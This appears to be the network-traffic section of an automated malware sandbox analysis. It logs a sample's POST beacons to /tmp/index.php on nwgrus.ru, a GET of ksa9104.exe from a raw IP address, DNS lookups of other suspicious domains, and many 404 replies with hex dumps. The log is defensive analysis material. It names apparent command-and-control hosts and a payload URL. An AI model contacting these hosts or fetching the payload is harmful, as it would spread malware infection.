    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwckdfwbqxcvipv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qeoeefjxuhhhbrbu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxxghskpkjdphcpk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
    Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
    Source: global trafficDNS traffic detected: DNS query: globalviewsnature.com
    Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://emovkvrsbdl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:19 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:35 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:43 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:16:57 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:16 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:34 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:52 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ec Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
